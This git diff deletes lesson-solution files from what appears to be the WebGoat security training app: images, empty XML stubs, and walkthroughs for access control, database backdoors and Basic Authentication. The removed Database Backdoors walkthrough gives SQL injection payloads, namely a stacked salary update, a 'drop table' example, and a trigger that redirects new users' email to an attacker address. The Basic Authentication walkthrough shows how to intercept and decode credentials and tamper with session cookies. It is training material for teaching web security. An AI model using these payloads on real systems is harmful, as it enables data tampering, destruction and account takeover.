diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/themedata.thmx b/src/main/webapp/lesson_solutions/WSDLScanning_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/filelist.xml b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/filelist.xml
deleted file mode 100644
index ce42de1c0..000000000
--- a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/filelist.xml
+++ /dev/null
@@ -1,24 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image001.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image001.png
deleted file mode 100644
index edac8c19a..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image003.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image003.png
deleted file mode 100644
index 0306a8f1f..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image005.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image005.png
deleted file mode 100644
index 7afb889fe..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image007.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image007.png
deleted file mode 100644
index 5c6c3d9c8..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image009.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image009.png
deleted file mode 100644
index 6d110d265..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image011.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image011.png
deleted file mode 100644
index 6831d62bf..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image013.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image013.png
deleted file mode 100644
index c04235add..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image015.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image015.png
deleted file mode 100644
index b0a6eceb4..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image015.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image017.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image017.png
deleted file mode 100644
index 78a1feb74..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image017.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg
deleted file mode 100644
index a6e68a265..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg
deleted file mode 100644
index 338a42ed8..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg
deleted file mode 100644
index c1662c8f0..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg
deleted file mode 100644
index 96f7253fd..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg
deleted file mode 100644
index c856ee032..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg
deleted file mode 100644
index 1cbf8ff3a..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg
deleted file mode 100644
index d9b59af8b..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg
deleted file mode 100644
index 5d30443e1..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg
deleted file mode 100644
index dec137dce..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg
deleted file mode 100644
index 7309a0035..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg
deleted file mode 100644
index 3b442cc42..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg
deleted file mode 100644
index 21ce9ef3d..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg
deleted file mode 100644
index 52b78aaca..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg
deleted file mode 100644
index bbc01ffc1..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg
deleted file mode 100644
index 27ca4296d..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/WsSAXInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/WsSAXInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/WsSAXInjection_files/filelist.xml
deleted file mode 100644
index 56559fd6d..000000000
--- a/src/main/webapp/lesson_solutions/WsSAXInjection_files/filelist.xml
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image001.png b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image001.png
deleted file mode 100644
index ba76d14d9..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image002.jpg b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image002.jpg
deleted file mode 100644
index 24692deda..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image003.png b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image003.png
deleted file mode 100644
index be045e27f..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image004.jpg b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image004.jpg
deleted file mode 100644
index c6698ffba..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image005.png b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image005.png
deleted file mode 100644
index 84e5ff852..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image006.jpg b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image006.jpg
deleted file mode 100644
index 40dcd7832..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image007.png b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image007.png
deleted file mode 100644
index 94b298db1..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image008.jpg b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image008.jpg
deleted file mode 100644
index 9faeaaac1..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image009.png b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image009.png
deleted file mode 100644
index acdfd2592..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image010.jpg b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image010.jpg
deleted file mode 100644
index ad7400d38..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image010.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/WsSAXInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/WsSqlInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/WsSqlInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/WsSqlInjection_files/filelist.xml
deleted file mode 100644
index 2596e1075..000000000
--- a/src/main/webapp/lesson_solutions/WsSqlInjection_files/filelist.xml
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image001.png b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image001.png
deleted file mode 100644
index 82abbd808..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image002.jpg b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image002.jpg
deleted file mode 100644
index 60c86b971..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image003.png b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image003.png
deleted file mode 100644
index e658bb1b9..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image004.jpg b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image004.jpg
deleted file mode 100644
index cb476bc0d..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image005.png b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image005.png
deleted file mode 100644
index d1db6bcb8..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image006.jpg b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image006.jpg
deleted file mode 100644
index f3e91d5e9..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image007.png b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image007.png
deleted file mode 100644
index d3bd79b6b..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image008.jpg b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image008.jpg
deleted file mode 100644
index 50c57e172..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/WsSqlInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/XMLInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/XMLInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/XMLInjection_files/filelist.xml
deleted file mode 100644
index 91acaa646..000000000
--- a/src/main/webapp/lesson_solutions/XMLInjection_files/filelist.xml
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image001.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image001.png
deleted file mode 100644
index b32e9194e..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image003.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image003.png
deleted file mode 100644
index f0de7feb1..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image005.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image005.png
deleted file mode 100644
index d2589d1b8..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image007.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image007.png
deleted file mode 100644
index d2489a851..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image009.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image009.png
deleted file mode 100644
index c2b095cd1..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image011.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image011.png
deleted file mode 100644
index e316c46cb..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image013.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image013.png
deleted file mode 100644
index 2c485734d..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image015.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image015.png
deleted file mode 100644
index f59f4c79b..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image015.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image017.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image017.jpg
deleted file mode 100644
index 5cde78c29..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image018.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image018.jpg
deleted file mode 100644
index 50a020099..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image019.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image019.jpg
deleted file mode 100644
index 3ec8d20a1..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image019.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image020.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image020.jpg
deleted file mode 100644
index 3181beb41..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image020.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image021.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image021.jpg
deleted file mode 100644
index 164e97f7d..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image022.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image022.jpg
deleted file mode 100644
index 155301a55..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image022.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image023.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image023.jpg
deleted file mode 100644
index 3ed684669..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image023.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image024.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image024.jpg
deleted file mode 100644
index 00a8ad33b..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image024.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/XMLInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/XPATHInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/XPATHInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/XPATHInjection_files/filelist.xml
deleted file mode 100644
index 3d5d19db6..000000000
--- a/src/main/webapp/lesson_solutions/XPATHInjection_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image001.png b/src/main/webapp/lesson_solutions/XPATHInjection_files/image001.png
deleted file mode 100644
index c710b2228..000000000
Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image003.png b/src/main/webapp/lesson_solutions/XPATHInjection_files/image003.png
deleted file mode 100644
index aa3b3886c..000000000
Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image005.png b/src/main/webapp/lesson_solutions/XPATHInjection_files/image005.png
deleted file mode 100644
index c63e9830a..000000000
Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image007.jpg b/src/main/webapp/lesson_solutions/XPATHInjection_files/image007.jpg
deleted file mode 100644
index a74456833..000000000
Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image007.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image008.jpg b/src/main/webapp/lesson_solutions/XPATHInjection_files/image008.jpg
deleted file mode 100644
index 229e969db..000000000
Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image009.jpg b/src/main/webapp/lesson_solutions/XPATHInjection_files/image009.jpg
deleted file mode 100644
index 731010dab..000000000
Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/XPATHInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/AccessControlMatrix.html b/src/main/webapp/lesson_solutions_1/AccessControlMatrix.html
deleted file mode 100644
index ab0e18e3c..000000000
--- a/src/main/webapp/lesson_solutions_1/AccessControlMatrix.html
+++ /dev/null
@@ -1,707 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: Using an
-Access Control Matrix
-
-
-
-
Concept /
-Topic To Teach:
-
-
-
-
In a
-role-based access control scheme, a role represents a set of access permissions
-and privileges. A user can be assigned one or more roles. A role-based access
-control scheme normally consists of two parts: role permission management and
-role assignment. A broken role-based access control scheme might allow a user
-to perform accesses that are not allowed by his/her assigned roles, or somehow
-allow privilege escalation to an unauthorized role.
-
-
-
-
General
-Goal(s):
-
-
Each user is
-a member of a role that is allowed to access only certain resources. Your goal
-is to explore the access control rules that govern this site. Only the [Admin]
-group should have access to the 'Account Manager' resource.
-
-
-
-
Solution:
-
-
-
-
This exercise
-is straightforward. You need to find a user where you can access a resource
-that you shouldn't be able to access.
-
-
After a few attempts
-you will learn that Larry can access resources of the role Account Manager.
Lesson
-Plan Title: How to
-Create Database Back Door Attacks.
-
-
-
-
Concept /
-Topic To Teach:
-
-
How to Create
-Database Back Door Attacks.
-
-
-
-
How the
-attacks works:
-
-
Databases are
-used usually as a backend for web applications. Also it is used as a media of
-storage. It can also be used as a place to store a malicious activity such as a
-trigger. A trigger is called by the database management system upon the
-execution of another database operation like insert, select, update or delete.
-An attacker for example can create a trigger that would set his email address
-instead of every new user's email address.
-
-
-
-
General
-Goal(s):
-
-
Your
-goal should be to learn how you can exploit a vulnerable query to create a
-trigger.
-You will not be able to actually create one in this lesson because the
-underlying database engine used with WebGoat doesn't support triggers.
-Your login ID is 101.
-
-
-
-
-
-
Figure 1 Database backdoor
-
-
-
-
Solution:
-
-
Enter your user ID 101 to see how the application works.
-
-
-
-
-
-
Figure 2 User ID is 101
-
-
-
-
As you
-probably noticed, the input is not validated so very easy to do SQL Injection.
-To have two SQL queries executed, you need to separate them using a sem-colon.
-For example select * from employees; drop table employees will first select all
-the users from employees and then drop the table employees. Not all databases
-support multiple SQL statements.
-
-
-
-
Here you need
-to update the salary of the employees. This requires an update query like
-update employees set salary=10000.
-
-
-
-
Inject this
-for the user ID: 101; update employee set salary=10000
-
-
-
-
-
-
Figure 3 Update query
-
-
-
-
-
-
Figure 4 Stage 1 completed
-
-
-
-
To create a
-database trigger, you need to inject the following SQL: CREATE TRIGGER
-myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET
-email='john@hackme.com'WHERE userid = NEW.userid
Basic
-Authentication is used to protect server side resources. The web server will send
-a 401 authentication request with the response for the requested resource. The
-client side browser will then prompt the user for a user name and password
-using a browser supplied dialog box. The browser will base64 encode the user
-name and password and send those credentials back to the web server. The web
-server will then validate the credentials and return the requested resource if
-the credentials are correct.
-
-
These
-credentials are automatically resent for each page protected with this
-mechanism without requiring the user to enter their credentials again.
-
-
-
-
General
-Goal(s):
-
-
For this
-lesson, your goal is to understand Basic Authentication and answer the
-questions below.
-
-
-
-
-
-
Figure 1 Lesson 13
-
-
-
-
To learn the
-name of the authentication header you must click “Submit” and intercept the
-request with WebScarab.
-
-
-
-
-
-
Figure 2 Intercepted request
-
-
-
-
The HTTP
-header that contains the Basic Authentication information is called
-"Authorization". This value Z3Vlc3Q6Z3Vlc3Q= is Base64 encoded. You can decode
-this by using WebScarab > Tools > Transcoder.
-
-
-
-
-
-
Figure 3 WebScarabs Transcoder
-
-
-
-
Click Base64
-decode.
-
-
-
-
-
-
Figure 4 Decode value
-
-
-
-
These values must
-be used to complete the questions.
-
-
-
-
-
-
Figure 5 Answers
-
-
-
-
-
-
-
-
Figure 6 Part 1 completed
-
-
-
-
For this
-lesson it is very important that you understand how the JSESSIONID cookie is
-used for session management and how the basic authorization header is used for
-authentication.
-
-
-
-
-
-
When WebGoat
-is able to retrieve a valid session you are automatically redirected to the
-lesson you are working on. When there is no valid session, WebGoat will create
-a new JSESSIONID and you will see the first lesson, HTTP Basics.
-
-
-
-
When there is
-no session cookie, WebGoat will first verify if you already authenticated. If
-not, you will get a pop-up window from the browser that requests your user name
-and password (guest/guest). After the user credentials are validated, you will
-access the Start-page of WebGoat and WebGoat will create a new JSESSIONID for
-this session.
-
-
-
-
To access
-WebGoat as the user basic, you need to corrupt the existing JSESSIONID and the
-Authorization header. You can do this in WebScarab. Intercept the request and
-delete a character from the JSESSIONID value and the Authorization header.
-
-
WebGoat will
-require you to authenticate, so you now enter for the user name basic and for
-the password basic. This logs you on as the user basic.
-
-
-
-
Remember our
-JSESSIONID? This JSESSIONID is a non-persistent cookie which is set during our
-first visit. Every request from the browser to WebGoat will have this cookie
-value. Corrupting this value in the previous request will not change the cookie
-value stored in browser memory and that is the reason why the old JSESSIONID
-cookie is sent in every request.
-
-
-
-
-
-
Figure 7 Basic Authentication
-
-
-
-
You clearly
-see that the JSESSIONID is the same like in the previous request, but the
-Authorization header now contains the Base 64 encoded value of basic:basic (you
-can decode this value in WebScarab > Tools > Transcoder).
-
-
-
-
Figure 8 Logged on as user basic
-
-
-
-
-
-
Because of the
-valid JSESSIONID, WebGoat retrieves the authenticated user via the server-side
-session object using getSession().getUser(). To make WebGoat believe that you
-are authenticated as basic, you need to corrupt the JSESSIONID, as shown in the
-screenshot below.
-
-
-
-
-
-
Figure 9 Corrupt JSESSIONID
-
-
-
-
-
-
-
-
Figure 10 Start page for user basic
-
-
-
-
Now you are
-redirected to the WebGoat start page. The JSESSIONID is changed and you lost all
-your green stars because the basic user hasn’t completed any lesson. Go to the
-lesson "Basic Authentication" to complete this lesson.
Concept / Topic To Teach:
